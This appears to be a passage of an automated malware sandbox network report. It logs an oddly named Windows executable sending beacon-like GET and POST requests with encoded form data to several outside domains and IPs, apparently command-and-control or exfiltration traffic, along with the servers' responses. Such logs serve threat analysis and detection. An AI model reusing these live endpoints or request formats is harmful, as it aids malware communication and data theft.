                                                                                      Sep 30, 2024 10:44:00.040126085 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.047077894 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.052700996 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.690763950 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.690785885 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.690799952 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.690888882 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.690983057 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.690999031 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.691009998 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.691020966 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.691030979 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.691032887 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.691042900 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.691054106 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.691121101 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.691155910 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.697861910 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.697876930 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.697890043 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.697943926 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.780510902 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.785936117 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.785949945 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.786050081 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.786060095 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.786107063 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.786139965 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.789297104 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.789309978 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.789319992 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.789360046 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.789419889 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.789469004 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.796278954 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.796417952 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.796428919 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.796464920 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.803067923 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.803092957 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.803105116 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.803132057 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.803179026 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.810532093 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.810698032 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.810709953 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.810782909 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.817440987 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.817454100 CEST8058803217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:44:00.817465067 CEST8058803217.160.0.158192.168.2.6
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 58772 | 172.191.244.62 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:41:53.224987984 CEST | 508 | OUT | GET /u1fq/?YDT4P=4xd8DzO&9jtPKX=8UziavWSK51wGh0yfoTPy09mw+AH3TZF6FMeVKjGe1eDtK62tODY8LE6LrUWxP2eUghCVKFR11/7ghpDkFpQ+ayhRkiuH+sQiiZHhsOmXN2fYM4UxJmKdMp/tZGxM5I0WcTc5ok= HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.dguy4youguys.wtf
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Sep 30, 2024 10:41:53.699368000 CEST | 195 | IN | HTTP/1.1 404 Not Found
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Date: Mon, 30 Sep 2024 08:41:53 GMT
                                                                                      Content-Length: 19
                                                                                      Connection: close
                                                                                      Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 58774 | 3.33.130.190 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:42:08.799442053 CEST | 757 | OUT | POST /chjf/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.8zu934.vip
                                                                                      Origin: http://www.8zu934.vip
                                                                                      Referer: http://www.8zu934.vip/chjf/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=aCujMsa6QgBo3k6V1QpjcAWLbHAZaJmFKmYyXGJPhJNFDRMKbh61vsrBts2mJncTKi56Jojsk5LeaCLLBS15je3txtiDwIOER4YdZeaqP3hvNIzJC+UODLTg6oo+2vvucP/D79xts4LWwIWSVW05NbFr8MWcDRz3I92oc4PIuIGaT0v2ITvGZqnneBuJHSzbmWXNPSf2BfyK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 58775 | 3.33.130.190 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:42:11.349627972 CEST | 781 | OUT | POST /chjf/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.8zu934.vip
                                                                                      Origin: http://www.8zu934.vip
                                                                                      Referer: http://www.8zu934.vip/chjf/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=aCujMsa6QgBo0HyV4X9jUAWIXnAZDZm/KmUyXHNfm6pFE1IKag61ssrBlM2vNncNKi0FJpfsk9reaGHLBFB6iO3r6NiB9oOER4YdZeeQP35vO7rJDfUNc7TjsYo+9PvqcP+g78tUs7/WwNySVH0+DbFlhcX0Gjv9Ib7WbeD+vYGkfiusUgvlL6HleD27HyzxkWvNdFTROrXp2dfIeelT77k5iUx93mZUJQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 58776 | 3.33.130.190 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:42:14.403007984 CEST | 1794 | OUT | POST /chjf/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.8zu934.vip
                                                                                      Origin: http://www.8zu934.vip
                                                                                      Referer: http://www.8zu934.vip/chjf/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 58777 | 3.33.130.190 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:42:16.938992977 CEST | 502 | OUT | GET /chjf/?9jtPKX=XAGDPb2hYSNA1G205B9yTUGnAX8dO+7zB1cLVHckxJo5ahU/aASovO/kl86KK2t3BQ9RD7nwrojXFmbxG19h+PHx3PeB45qZXKA/WsiIO1RcOY79PupkSKjjj5g2/+z2ZvrlzLs=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.8zu934.vip
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Sep 30, 2024 10:42:17.405038118 CEST | 412 | IN | HTTP/1.1 200 OK
                                                                                      Server: openresty
                                                                                      Date: Mon, 30 Sep 2024 08:42:17 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 272
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9jtPKX=XAGDPb2hYSNA1G205B9yTUGnAX8dO+7zB1cLVHckxJo5ahU/aASovO/kl86KK2t3BQ9RD7nwrojXFmbxG19h+PHx3PeB45qZXKA/WsiIO1RcOY79PupkSKjjj5g2/+z2ZvrlzLs=&YDT4P=4xd8DzO"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 58779 | 203.161.41.205 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:42:22.466061115 CEST | 760 | OUT | POST /pzb3/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.tophfy.info
                                                                                      Origin: http://www.tophfy.info
                                                                                      Referer: http://www.tophfy.info/pzb3/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=REYWdGbvsnqq9HFogUQlm5cRLWeRsHD6ibFPiqRUq8ZrADO6sn7iLJhSZVsd1gOWTNtngxZmBnIWqNBeVVFkcOnfBZoAEBYO0eiEAwVljdJJSf4IWNkdg2i9JUPWflsYE6GpvyV0waOA45Gib9YpBBCokmKGUsPJ0T0cdc9ZtDILZ+Nkn3t+Pfvl//MtacKxdWHolVhIB/sg
Sep 30, 2024 10:42:23.054466963 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:42:22 GMT
                                                                                      Server: Apache
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Content-Length: 389
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      6 | 192.168.2.6 | 58780 | 203.161.41.205 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:42:25.035911083 CEST | 784 | OUT | POST /pzb3/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.tophfy.info
                                                                                      Origin: http://www.tophfy.info
                                                                                      Referer: http://www.tophfy.info/pzb3/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=REYWdGbvsnqq8m1om34lhZcQVmeRmnD+ibBPirFEqJxrDi+6+27iHphSBFsEqwOfTNRvgwJmBn0WqMxeVipndenZLJoGABYO0eiEAwRLjdRJSrEIXskaj2i+MkPWJlscE6H6vzYhwY2A442ibvwqPBCmqGL1E96VtgN5Dcpl5CcMRoM+7EtddPPn/9Ufa8KbfW/o3CtvOLJDyavaC88pdioSkA8jywtPbA==
                                                                                      Sep 30, 2024 10:42:25.636146069 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:42:25 GMT
                                                                                      Server: Apache
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Content-Length: 389
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      7 | 192.168.2.6 | 58781 | 203.161.41.205 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:42:27.583364964 CEST | 1797 | OUT | POST /pzb3/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.tophfy.info
                                                                                      Origin: http://www.tophfy.info
                                                                                      Referer: http://www.tophfy.info/pzb3/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:42:28.158399105 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:42:28 GMT
                                                                                      Server: Apache
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Content-Length: 389
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      8 | 192.168.2.6 | 58782 | 203.161.41.205 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:42:30.125570059 CEST | 503 | OUT | GET /pzb3/?YDT4P=4xd8DzO&9jtPKX=cGw2exDyh1KVkWsHkX4xj4lgVlPPukG30+Eeh6IH5uNyYRC1xGnnB8QFExEpiTL5bcBgsA98LG9yqfxBLyBILpDqP6cmLzlnqu2CIAVnl8NdZZMCWNNFkUmCCHKhOgovLr644XM= HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.tophfy.info
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:42:30.704447031 CEST | 610 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:42:30 GMT
                                                                                      Server: Apache
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Content-Length: 389
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      9 | 192.168.2.6 | 58783 | 65.21.196.90 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:42:35.840297937 CEST | 766 | OUT | POST /zl45/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.030002837.xyz
                                                                                      Origin: http://www.030002837.xyz
                                                                                      Referer: http://www.030002837.xyz/zl45/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=q+A3P+LStnSTszGQAunCIanAuaL18urXFK+9u2zh6gpMIC/MOgoyQRL0obDwe096jg/kdneNPAcdhJe/iwiR3vI24CagTma3hz+MCwqfJoDQWx29tu7SfZY7sz0Qgv56ITcO51Pw23kDbskd2+kYH49AbzRW87CIjnHCDm4eOTIRJqHep8NCjTaDyaDOAljlFBYYQuoY+EBV
                                                                                      Sep 30, 2024 10:42:36.838613987 CEST | 1038 | IN | HTTP/1.1 302 Found
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 771
                                                                                      date: Mon, 30 Sep 2024 08:42:36 GMT
                                                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                      location: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi
                                                                                      vary: User-Agent
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>
                                                                                      Sep 30, 2024 10:42:36.839123964 CEST | 1038 | IN | HTTP/1.1 302 Found
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 771
                                                                                      date: Mon, 30 Sep 2024 08:42:36 GMT
                                                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                      location: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi
                                                                                      vary: User-Agent
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      10 | 192.168.2.6 | 58784 | 65.21.196.90 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:42:38.378262997 CEST | 790 | OUT | POST /zl45/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.030002837.xyz
                                                                                      Origin: http://www.030002837.xyz
                                                                                      Referer: http://www.030002837.xyz/zl45/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=q+A3P+LStnSTtQeQHNfCcKnDjKL1yOrpFKy9uyis7W5MImzMPkcyTRL0n7C4DE99jgjWdlKNPAIdhIu/imqS3/I0jSa+O2a3hz+MCwOxJsXQWgG9//7dX5Y4rz0Qkv5mITcw5wWb2ygDbusd4MAbI49KWTRHs7jYl36xCAUNOAU0McGE1PNhxD6ByYb8AFjPHBgYC5k/xwk2olREUmdxAzWr9WdQXhyzsQ==
                                                                                      Sep 30, 2024 10:42:39.054147959 CEST | 1038 | IN | HTTP/1.1 302 Found
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 771
                                                                                      date: Mon, 30 Sep 2024 08:42:38 GMT
                                                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                      location: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi
                                                                                      vary: User-Agent
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      11 | 192.168.2.6 | 58785 | 65.21.196.90 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:42:40.922142029 CEST | 1803 | OUT | POST /zl45/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.030002837.xyz
                                                                                      Origin: http://www.030002837.xyz
                                                                                      Referer: http://www.030002837.xyz/zl45/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:42:41.574207067 CEST | 1038 | IN | HTTP/1.1 302 Found
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 771
                                                                                      date: Mon, 30 Sep 2024 08:42:41 GMT
                                                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                      location: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi
                                                                                      vary: User-Agent
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
